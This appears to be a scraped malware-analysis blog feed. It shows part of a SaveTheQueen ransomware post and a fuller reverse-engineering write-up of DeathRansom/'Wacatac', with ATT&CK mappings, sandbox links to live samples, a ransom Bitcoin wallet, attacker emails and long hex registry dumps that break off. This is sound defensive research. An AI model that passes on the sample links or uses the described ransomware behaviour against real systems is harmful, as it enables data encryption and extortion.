<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">The SaveTheQueen ransomware is π...<br>The ransomware sample -> ConfuserEx -> shellcode -> embed in C# injector dll (base64 encoded) -> PowerShell script (base64 + GZip) -> PS2EXE - and not even sure if that's all...<a href="https://twitter.com/demonslay335?ref_src=twsrc%5Etfw">@demonslay335</a></p>— MalwareHunterTeam (@malwrhunterteam) <a href="https://twitter.com/malwrhunterteam/status/1207378905386094593?ref_src=twsrc%5Etfw">December 18, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> </center></p>
<p></br></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1035</em> --> Service Execution --> Execution</p>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1055</em> --> Process Injection --> Privilege Escalation</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1055</em> --> Process Injection --> Defense Evasion</p>
<p><em>T1112</em> --> Modify Registry --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1046</em> --> Network Service Scanning --> Discovery</p>
<p><em>T1120</em> --> Peripheral Device Discovery --> Discovery</p>
<p><em>T1057</em> --> Process Discovery --> Discovery</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>SaveTheQueen</h3>
<div class="highlight"><pre><span></span><span class="n">SaveTheQueen</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">12288</span><span class="p">:</span><span class="n">a4Gvlgr3S</span><span class="o">/</span><span class="n">Jsftu5hU17WFKp4NpBvUssesKtIKy7vr4YT0PgZ304lGrDJo8YFfDY</span><span class="p">:</span><span class="n">ayw3ZwEaSAVX8Zye</span><span class="o">/</span>
</pre></div>
<h3>Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">RestartManager</span><span class="err">\</span><span class="n">Session00xx</span>
<span class="k">Owner</span> <span class="c1">--> 6C 0A 00 00 26 23 E1 EB AC A6 D5 01</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">RestartManager</span><span class="err">\</span><span class="n">Session00xx</span>
<span class="n">SessionHash</span> <span class="c1">--> 32 Byte Hex</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">RestartManager</span><span class="err">\</span><span class="n">Session00xx</span>
<span class="n">RegFiles0000</span> <span class="c1">--> Files to be encrypted/stolen</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">RestartManager</span><span class="err">\</span><span class="n">Session00xx</span>
<span class="n">RegFilesHash</span> <span class="c1">--> 32 Byte Hex</span>
</pre></div>
<p><br/></p>Quick and painless - Reversing DeathRansom / "Wacatac"2019-11-19T00:00:00+01:002019-11-19T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-11-19:/quick-and-painless-reversing-deathransom-wacatac.html<p>No flashy wallpapers or other bells and whistles, but if you aren't careful and maintain backups as you should DeathRansom will take your data with it to its grave. Or will it ?</p><p><center><img alt="Logo" src="https://dissectingmalwa.re/img/deathransom-logo.png"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>DeathRansom @ <a href="https://app.any.run/tasks/9ab9fd28-83ee-4990-9c8e-7a8169f41787/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/7c2dbad516d18d2c1c21ecc5792bc232f7b34dadc1bc19e967190d79174131d1/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/7c2dbad516d18d2c1c21ecc5792bc232f7b34dadc1bc19e967190d79174131d1?environmentId=100">HybridAnalysis</a>
--> <code>sha256 3a5b015655f3aad4b4fd647aa34fda4ce784d75a20d12a73f8dc0e0d866e7e01</code></p>
<p></br></p>
<p>The plain text note doesn't look that special. I'll be refering to this strain as Deathransom, since the <a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.wacatac.usxvpga19">Wacatac</a> Trojan doesn't seem to be affiliated with the sample. </p>
<p><center><img alt="DeathRansom Note" src="https://dissectingmalwa.re/img/deathransom-note.png"></center></p>
<p></br></p>
<p>The "Wacatac" Registry Keys are most likely an attempt at a false flag manouver. The Ransomware will set three Regkeys in total: The main Key <strong>HKEY_CURRENT_USER\SOFTWARE\Wacatac</strong> and two sub keys called <strong>private</strong> and <strong>public</strong>. The hex value set in the "private" acutally corresponds to the Lock ID referenced in the Ransomnote. Analysing the encryption loop will probably present the relation between these values, so I'll keep going.</p>
<p><center><img alt="Setting the Registry Key Note" src="https://dissectingmalwa.re/img/deathransom-regKey.png"></center></p>
<p></br></p>
<p><center><img alt="Private Reg Key" src="https://dissectingmalwa.re/img/deathransom-regKey1.png"></center></p>
<p></br></p>
<p>Somewhat of a rare occurance, but Deathransom will actually take out the trash for you by clearing the recycling bin.</p>
<p><center><img alt="Emptying the recycling Bin" src="https://dissectingmalwa.re/img/deathransom-recbin.png"></center></p>
<p></br></p>
<p>Generally this sample seems to be very limited in features, but let's see how they implemented the encryption routine. Looking for <em>CreateFileW</em> we can see that it appends the <em>.wctc</em> extension to the name of the current file. But where's the encryption happening? Either they hid it very well or they just plainly forgot about it π€</p>
<p><center><img alt="Suspicious CreateFile" src="https://dissectingmalwa.re/img/deathransom-createFile.png"></center></p>
<p></br></p>
<p>Let's just fire up a VM and see what happens to the files after the encryption takes place so we have a better idea of what to look for. I got no UAC prompt upon running the sample and the ransom process seemed a bit fast. Checking out the sample files we can see what actually happened:</p>
<p><center><img alt="Unencrypted sample files" src="https://dissectingmalwa.re/img/deathransom-samplefiles.png"></center></p>
<p>Exactly, nothing. I don't want to jump to conclusions here, but this strain might still be in the testing stage or is just a plain hoax. Regardless it is still possible that another variant turns up that will actually encrypt the files.</p>
<p></br></p>
<h2><strong>Update 25.11.2019:</strong></h2>
<p>As predicted there is <a href="https://www.bleepingcomputer.com/forums/t/708252/deathransom-wacatac-ransomware-wctc;-read-metxt-support-topic/">another version</a> of the Ransomware available now and it seems to do its job a lot more thorough than its predecessor. The new build doesn't seem to append a new suffix to the file and the ransomnote has been adapted slightly because it now features a Bitcoin wallet address and a new E-Mail contact.</p>
<p>DeathRansom V2 @ <a href="https://app.any.run/tasks/8ae02ba0-9bf2-45cb-bdcb-ba650ed94a34/">AnyRun</a> --> <code>sha256 fedb4c3b0e080fb86796189ccc77f99b04adb105d322bddd3abfca2d5c5d43c8</code></p>
<p></br></p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/deathransom-diev2.png"></center></p>
<p>Entropy-wise the sample doesn't seem to be packed and nor are there any weird sections or paddings. Compiler and Linker Versions point towards Visual Studio 2013 being utilized by the creators.</p>
<p></br></p>
<p><center><img alt="Packet Capture" src="https://dissectingmalwa.re/img/deathransom-pcap.png"></center></p>
<p>Looking at the packets captured during the dynamic analysis we notice a DNS request plus TCP traffic to iplogger[.]org which was not present in the first Version of the Ransomware. Looks like the criminals are trying to track infections over time.</p>
<p></br></p>
<p><center><img alt="Checking out the BTC Wallet" src="https://dissectingmalwa.re/img/deathransom-btc.png"></center></p>
<p>According to <a href="https://www.blockchain.com/btc/address/1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N">Blockchain.com</a> the Bitcoin Wallet mentioned in the V2 Ransomnote doesn't have any transactions on it as of the 30th of November, which is really good news :)</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>DeathRansom</h3>
<div class="highlight"><pre><span></span><span class="n">deathransom</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 7c2dbad516d18d2c1c21ecc5792bc232f7b34dadc1bc19e967190d79174131d1</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">1536</span><span class="p">:</span><span class="n">gZVYb2bbBisyEcPC00h7sBvvKk</span><span class="o">+</span><span class="n">jTc7</span><span class="o">+</span><span class="n">T8l7RJV62CzVDL</span><span class="o">+</span><span class="n">oWB27evMCUQ</span><span class="p">:</span><span class="n">EV</span><span class="o">+</span><span class="n">GiVEc6RsMJQ</span>
<span class="n">fyukfuyk</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: ab828f0e0555f88e3005387cb523f221a1933bbd7db4f05902a1e5cc289e7ba4</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">6144</span><span class="p">:</span><span class="n">f849</span><span class="o">/</span><span class="n">IB5jZozuL1itPJAOsF0l</span><span class="o">+</span><span class="n">t5Dn0ChC</span><span class="p">:</span><span class="n">f8kIB5jZyNVJWF0AHDC</span>
<span class="mi">2</span><span class="n">p1km7pr6l</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: fedb4c3b0e080fb86796189ccc77f99b04adb105d322bddd3abfca2d5c5d43c8</span>
<span class="mi">3072</span><span class="p">:</span><span class="n">ou1DaA5w1KmC5RjPquqavANItF2rv8ojAjAD5m9</span><span class="p">:</span><span class="n">Kb6Lq8wHUoe</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">death</span><span class="nv">@firemail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">cc</span><span class="w"></span>
<span class="n">death</span><span class="nv">@cumallover</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">me</span><span class="w"></span>
<span class="n">deathransom</span><span class="nv">@airmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">cc</span><span class="w"></span>
</pre></div>
<h3>Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Wacatac</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Wacatac</span><span class="err">\</span><span class="k">public</span>
<span class="n">FA</span> <span class="n">DE</span> <span class="mi">13</span> <span class="n">AA</span> <span class="mi">52</span> <span class="mi">43</span> <span class="n">DF</span> <span class="mi">85</span> <span class="n">B2</span> <span class="mi">62</span> <span class="n">A5</span> <span class="mi">88</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">17</span> <span class="n">D0</span> <span class="mi">59</span> <span class="mi">99</span> <span class="n">BF</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">69</span> <span class="mi">5</span><span class="n">F</span> <span class="mi">71</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">76</span> <span class="n">D4</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">36</span> <span class="mi">86</span> <span class="n">B6</span> <span class="mi">47</span> <span class="n">CA</span> <span class="n">D4</span> <span class="n">A2</span> <span class="n">C0</span> <span class="mi">40</span> <span class="mi">52</span> <span class="n">D5</span> <span class="n">FF</span> <span class="n">FC</span> <span class="n">B8</span> <span class="n">DE</span> <span class="n">E2</span> <span class="n">F7</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">75</span> <span class="mi">27</span> <span class="mi">10</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">64</span> <span class="mi">31</span> <span class="n">CE</span> <span class="mi">55</span> <span class="mi">82</span> <span class="n">FD</span> <span class="mi">91</span> <span class="mi">8</span><span class="n">F</span> <span class="mi">58</span> <span class="mi">65</span> <span class="n">C3</span> <span class="mi">5</span><span class="n">E</span> <span class="mi">49</span> <span class="n">E1</span> <span class="mi">14</span> <span class="n">DD</span> <span class="mi">89</span> <span class="mi">9</span><span class="n">B</span> <span class="mi">9</span><span class="k">C</span> <span class="mi">59</span> <span class="n">EB</span> <span class="mi">11</span> <span class="mi">54</span> <span class="n">AC</span> <span class="n">A2</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">8</span><span class="n">A</span> <span class="n">E4</span> <span class="n">DC</span> <span class="mi">62</span> <span class="n">FF</span> <span class="mi">21</span> <span class="mi">1</span><span class="n">A</span> <span class="n">F4</span> <span class="mi">5</span><span class="n">F</span> <span class="mi">44</span> <span class="n">FB</span> <span class="mi">76</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">4</span><span class="k">C</span> <span class="n">D0</span> <span class="mi">07</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">83</span> <span class="mi">06</span> <span class="n">B6</span> <span class="mi">32</span> <span class="mi">54</span> <span class="n">B8</span> <span class="mi">9</span><span class="n">B</span> <span class="n">EC</span> <span class="n">EF</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">25</span> <span class="mi">9</span><span class="n">A</span> <span class="n">FD</span> <span class="mi">95</span> <span class="n">AC</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">53</span> <span class="n">D5</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">04</span> <span class="n">CC</span> <span class="n">C4</span> <span class="mi">93</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">06</span> <span class="mi">02</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">41</span> <span class="mi">63</span> <span class="n">A8</span> <span class="n">BF</span> <span class="n">BB</span> <span class="n">AA</span> <span class="n">E1</span> <span class="mi">1</span><span class="n">F</span> <span class="n">BD</span> <span class="n">E5</span> <span class="n">DA</span> <span class="n">F9</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">46</span> <span class="n">AD</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">89</span> <span class="mi">89</span> <span class="n">D0</span> <span class="n">EC</span> <span class="mi">62</span> <span class="mi">55</span> <span class="n">B5</span> <span class="n">E7</span> <span class="n">A3</span> <span class="n">D4</span> <span class="n">C5</span> <span class="mi">80</span> <span class="n">C7</span> <span class="mi">34</span> <span class="mi">39</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">71</span> <span class="mi">27</span> <span class="mi">60</span> <span class="n">EA</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">45</span> <span class="mi">2</span><span class="n">D</span> <span class="n">A0</span> <span class="mi">90</span> <span class="n">F9</span> <span class="mi">75</span> <span class="n">E8</span> <span class="n">D3</span> <span class="n">A4</span> <span class="n">DF</span> <span class="n">E4</span> <span class="n">C5</span> <span class="n">E0</span> <span class="mi">5</span><span class="k">C</span> <span class="n">BB</span> <span class="n">B8</span> <span class="mi">46</span> <span class="mi">91</span> <span class="mi">87</span> <span class="n">AA</span> <span class="mi">05</span> <span class="n">E3</span> <span class="mi">06</span> <span class="mi">8</span><span class="n">D</span> <span class="n">A0</span> <span class="mi">89</span> <span class="n">F6</span> <span class="mi">12</span> <span class="mi">74</span> <span class="n">B4</span> <span class="n">CA</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">62</span> <span class="n">A0</span> <span class="n">F7</span> <span class="n">E3</span> <span class="n">A6</span> <span class="mi">93</span> <span class="mi">0</span><span class="k">C</span> <span class="n">AD</span> <span class="mi">77</span> <span class="n">C3</span> <span class="n">C9</span> <span class="n">A1</span> <span class="n">DE</span> <span class="n">DB</span> <span class="n">A0</span> <span class="mi">0</span><span class="n">F</span> <span class="n">CC</span> <span class="n">D6</span> <span class="n">A2</span> <span class="mi">0</span><span class="k">C</span> <span class="n">DD</span> <span class="n">AB</span> <span class="mi">94</span> <span class="mi">9</span><span class="n">B</span> <span class="mi">25</span> <span class="mi">90</span> <span class="mi">4</span><span class="n">A</span> <span class="n">A4</span> <span class="mi">56</span> <span class="mi">91</span> <span class="n">C4</span> <span class="mi">07</span> <span class="n">BA</span> <span class="mi">13</span> <span class="n">FA</span> <span class="n">E9</span> <span class="mi">44</span> <span class="mi">23</span> <span class="n">FB</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">8</span><span class="n">E</span> <span class="mi">53</span> <span class="n">D2</span> <span class="mi">82</span> <span class="mi">6</span><span class="n">F</span> <span class="n">B5</span> <span class="mi">4</span><span class="n">B</span> <span class="n">C3</span> <span class="n">EE</span> <span class="mi">2</span><span class="n">F</span> <span class="n">E4</span> <span class="mi">1</span><span class="n">F</span> <span class="n">C0</span> <span class="mi">16</span> <span class="mi">03</span> <span class="mi">89</span> <span class="mi">5</span><span class="n">F</span> <span class="n">DE</span> <span class="n">EA</span> <span class="n">E7</span> <span class="mi">76</span> <span class="mi">12</span> <span class="n">A9</span> <span class="n">A3</span> <span class="mi">13</span> <span class="mi">0</span><span class="n">F</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Wacatac</span><span class="err">\</span><span class="n">private</span>
<span class="mi">03</span> <span class="n">F0</span> <span class="n">D6</span> <span class="n">A3</span> <span class="mi">0</span><span class="n">B</span> <span class="n">D6</span> <span class="mi">45</span> <span class="mi">0</span><span class="n">A</span> <span class="n">EF</span> <span class="mi">50</span> <span class="mi">65</span> <span class="mi">59</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">55</span> <span class="mi">95</span> <span class="n">C7</span> <span class="mi">3</span><span class="n">D</span> <span class="n">C9</span> <span class="mi">5</span><span class="n">F</span> <span class="n">C1</span> <span class="n">FC</span> <span class="mi">04</span> <span class="mi">69</span> <span class="mi">68</span> <span class="mi">32</span> <span class="mi">47</span> <span class="mi">74</span> <span class="n">BD</span> <span class="n">F9</span> <span class="mi">72</span> <span class="mi">43</span> <span class="mi">13</span> <span class="mi">4</span><span class="n">D</span> <span class="n">EB</span> <span class="mi">57</span> <span class="n">EB</span> <span class="mi">93</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">6</span><span class="n">F</span> <span class="n">A2</span> <span class="n">C9</span> <span class="n">FB</span> <span class="n">D8</span> <span class="n">AC</span> <span class="mi">99</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">32</span> <span class="mi">1</span><span class="n">E</span> <span class="n">C8</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">33</span> <span class="mi">27</span> <span class="n">B6</span> <span class="mi">40</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">6</span><span class="n">F</span> <span class="n">B6</span> <span class="mi">6</span><span class="n">A</span> <span class="n">AA</span> <span class="mi">80</span> <span class="n">B6</span> <span class="mi">65</span> <span class="n">BA</span> <span class="n">B9</span> <span class="mi">64</span> <span class="n">F1</span> <span class="mi">92</span> <span class="mi">89</span> <span class="n">C7</span> <span class="n">BA</span> <span class="n">F0</span> <span class="n">A1</span> <span class="mi">5</span><span class="n">E</span> <span class="n">A5</span> <span class="mi">95</span> <span class="mi">9</span><span class="k">C</span> <span class="mi">22</span> <span class="mi">62</span> <span class="mi">41</span> <span class="n">DC</span> <span class="mi">5</span><span class="n">B</span> <span class="n">B8</span> <span class="mi">5</span><span class="k">C</span> <span class="mi">8</span><span class="n">A</span> <span class="mi">4</span><span class="n">E</span> <span class="n">DB</span> <span class="mi">45</span> <span class="mi">21</span> <span class="mi">6</span><span class="k">C</span> <span class="n">F7</span> <span class="mi">83</span> <span class="mi">78</span> <span class="mi">5</span><span class="n">E</span> <span class="mi">13</span> <span class="n">E1</span> <span class="mi">01</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">60</span> <span class="mi">32</span> <span class="n">C3</span> <span class="n">E1</span> <span class="mi">00</span> <span class="n">A2</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">9</span><span class="n">B</span> <span class="n">D3</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">66</span> <span class="mi">03</span> <span class="n">DA</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">49</span> <span class="mi">94</span> <span class="mi">8</span><span class="n">B</span> <span class="n">C3</span> <span class="mi">76</span> <span class="mi">7</span><span class="n">F</span> <span class="n">DE</span> <span class="mi">53</span> <span class="mi">88</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">25</span> <span class="mi">93</span> <span class="n">B9</span> <span class="mi">90</span> <span class="mi">64</span> <span class="n">F4</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">95</span> <span class="mi">9</span><span class="n">E</span> <span class="n">B9</span> <span class="mi">68</span> <span class="mi">73</span> <span class="n">C3</span> <span class="mi">43</span> <span class="n">D1</span> <span class="n">EF</span> <span class="mi">54</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">34</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">18</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">87</span> <span class="n">C2</span> <span class="n">A8</span> <span class="mi">95</span> <span class="mi">59</span> <span class="mi">84</span> <span class="n">F9</span> <span class="n">A5</span> <span class="mi">0</span><span class="n">E</span> <span class="n">DE</span> <span class="mi">8</span><span class="n">F</span> <span class="n">CF</span> <span class="mi">93</span> <span class="mi">6</span><span class="n">E</span> <span class="mi">7</span><span class="k">C</span> <span class="n">EC</span> <span class="n">EA</span> <span class="mi">66</span> <span class="n">B7</span> <span class="mi">6</span><span class="n">F</span> <span class="mi">37</span> <span class="mi">05</span> <span class="mi">16</span> <span class="mi">16</span> <span class="mi">20</span> <span class="n">FF</span> <span class="mi">63</span> <span class="n">CD</span> <span class="mi">20</span> <span class="n">E3</span> <span class="mi">16</span> <span class="mi">56</span> <span class="n">EB</span> <span class="mi">11</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">82</span> <span class="mi">73</span> <span class="n">C7</span> <span class="mi">9</span><span class="k">C</span> <span class="n">B0</span> <span class="mi">04</span> <span class="mi">17</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">36</span> <span class="mi">61</span> <span class="n">FE</span> <span class="mi">31</span> <span class="mi">81</span> <span class="mi">13</span> <span class="mi">49</span> <span class="n">DF</span> <span class="n">D1</span> <span class="n">A9</span> <span class="mi">88</span> <span class="mi">8</span><span class="n">E</span> <span class="n">EF</span> <span class="n">C8</span> <span class="n">E6</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">57</span> <span class="mi">34</span> <span class="mi">68</span> <span class="mi">91</span> <span class="mi">92</span> <span class="mi">7</span><span class="n">B</span> <span class="n">A8</span> <span class="mi">74</span> <span class="mi">41</span> <span class="n">E4</span> <span class="n">B6</span> <span class="n">AA</span> <span class="n">E4</span> <span class="mi">4</span><span class="n">E</span> <span class="n">EF</span> <span class="n">C1</span> <span class="n">FB</span> <span class="n">E5</span> <span class="n">EA</span> <span class="n">B7</span> <span class="n">A9</span> <span class="n">C1</span> <span class="n">F1</span> <span class="n">CC</span> <span class="n">E0</span> <span class="mi">05</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">37</span> <span class="mi">45</span> <span class="n">A1</span> <span class="mi">68</span> <span class="mi">8</span><span class="k">C</span> <span class="n">E1</span> <span class="mi">0</span><span class="n">E</span> <span class="mi">4</span><span class="n">E</span> <span class="n">F3</span> <span class="mi">27</span> <span class="n">CC</span> <span class="mi">52</span> <span class="mi">88</span> <span class="mi">6</span><span class="k">C</span> <span class="n">FF</span> <span class="mi">78</span> <span class="n">F6</span> <span class="n">B3</span> <span class="n">A0</span> <span class="mi">19</span> <span class="mi">89</span> <span class="n">E8</span> <span class="n">E2</span> <span class="mi">0</span><span class="k">C</span> <span class="mi">15</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">60</span> <span class="n">D5</span> <span class="mi">5</span><span class="n">E</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">92</span> <span class="mi">53</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">0</span><span class="n">B</span> <span class="n">F7</span> <span class="n">D8</span> <span class="mi">12</span> <span class="n">F1</span> <span class="mi">9</span><span class="n">B</span> <span class="n">A4</span> <span class="mi">18</span> <span class="n">E7</span> <span class="n">FF</span> <span class="n">D3</span> <span class="mi">70</span> <span class="mi">94</span> <span class="mi">2</span><span class="n">A</span> <span class="n">A6</span> <span class="mi">91</span> <span class="mi">93</span> <span class="mi">28</span> <span class="n">C0</span> <span class="n">F1</span> <span class="mi">47</span> <span class="n">A4</span> <span class="mi">25</span> <span class="n">A1</span> <span class="n">FC</span> <span class="mi">93</span> <span class="mi">96</span> <span class="mi">36</span> <span class="mi">52</span> <span class="mi">37</span> <span class="n">F8</span> <span class="n">A8</span> <span class="n">F4</span> <span class="mi">24</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">12</span> <span class="mi">8</span><span class="n">F</span> <span class="n">FC</span> <span class="mi">0</span><span class="n">E</span> <span class="n">D1</span> <span class="mi">46</span> <span class="mi">22</span> <span class="n">A6</span> <span class="n">B4</span> <span class="mi">3</span><span class="n">E</span> <span class="mi">44</span> <span class="mi">40</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">87</span> <span class="mi">11</span> <span class="n">FC</span> <span class="mi">87</span> <span class="mi">9</span><span class="k">C</span> <span class="mi">54</span> <span class="n">E9</span> <span class="mi">56</span> <span class="n">B0</span> <span class="mi">04</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">25</span> <span class="mi">20</span> <span class="n">A0</span> <span class="mi">69</span> <span class="mi">0</span><span class="n">F</span> <span class="n">B2</span> <span class="mi">8</span><span class="n">F</span> <span class="n">A7</span> <span class="n">D6</span> <span class="n">D1</span> <span class="n">D8</span> <span class="mi">79</span> <span class="n">B9</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">61</span> <span class="n">DA</span> <span class="mi">81</span> <span class="n">D6</span> <span class="mi">77</span> <span class="mi">80</span> <span class="mi">34</span> <span class="n">DE</span> <span class="n">FE</span> <span class="n">D5</span> <span class="mi">08</span> <span class="mi">00</span> <span class="mi">04</span> <span class="n">E2</span> <span class="mi">9</span><span class="n">A</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">84</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">87</span> <span class="n">EB</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">58</span> <span class="mi">87</span> <span class="n">B5</span> <span class="n">E4</span> <span class="mi">24</span> <span class="n">CC</span> <span class="mi">69</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">41</span> <span class="n">E6</span> <span class="mi">90</span> <span class="mi">25</span> <span class="mi">07</span> <span class="mi">6</span><span class="n">B</span> <span class="n">FE</span> <span class="n">A1</span> <span class="mi">4</span><span class="n">E</span> <span class="n">F7</span> <span class="n">C9</span> <span class="mi">20</span> <span class="n">ED</span> <span class="mi">92</span> <span class="mi">0</span><span class="n">A</span> <span class="n">F5</span> <span class="n">E0</span> <span class="mi">96</span> <span class="n">BB</span> <span class="n">B0</span> <span class="mi">85</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">66</span> <span class="mi">6</span><span class="n">A</span> <span class="n">F7</span> <span class="n">FF</span> <span class="mi">5</span><span class="n">B</span> <span class="n">C6</span> <span class="n">E8</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">03</span> <span class="mi">79</span> <span class="n">F4</span> <span class="mi">35</span> <span class="mi">73</span> <span class="mi">54</span> <span class="mi">30</span> <span class="mi">45</span> <span class="n">F5</span> <span class="n">FF</span> <span class="n">AF</span> <span class="mi">75</span> <span class="n">D7</span> <span class="n">FA</span> <span class="mi">9</span><span class="n">B</span> <span class="mi">45</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">77</span> <span class="mi">79</span> <span class="mi">0</span><span class="n">E</span> <span class="n">DC</span> <span class="n">E9</span> <span class="n">D1</span> <span class="mi">86</span> <span class="mi">40</span> <span class="mi">47</span> <span class="mi">18</span> <span class="n">D0</span> <span class="n">CD</span> <span class="n">B6</span> <span class="n">AE</span> <span class="mi">12</span> <span class="mi">90</span> <span class="mi">53</span> <span class="mi">43</span> <span class="n">F7</span> <span class="n">D1</span> <span class="mi">12</span> <span class="n">A3</span> <span class="mi">70</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">8</span><span class="n">F</span> <span class="mi">9</span><span class="n">A</span> <span class="mi">45</span> <span class="n">F1</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">61</span> <span class="mi">10</span> <span class="n">A8</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">54</span> <span class="mi">15</span> <span class="n">E1</span> <span class="n">F4</span> <span class="n">AB</span> <span class="mi">3</span><span class="n">E</span> <span class="mi">80</span> <span class="n">FA</span> <span class="n">A0</span> <span class="mi">11</span> <span class="mi">55</span> <span class="mi">0</span><span class="k">C</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">24</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">22</span> <span class="mi">40</span> <span class="mi">84</span> <span class="n">DC</span> <span class="n">E8</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">07</span> <span class="n">BA</span> <span class="n">A1</span> <span class="mi">16</span> <span class="mi">17</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">06</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">66</span> <span 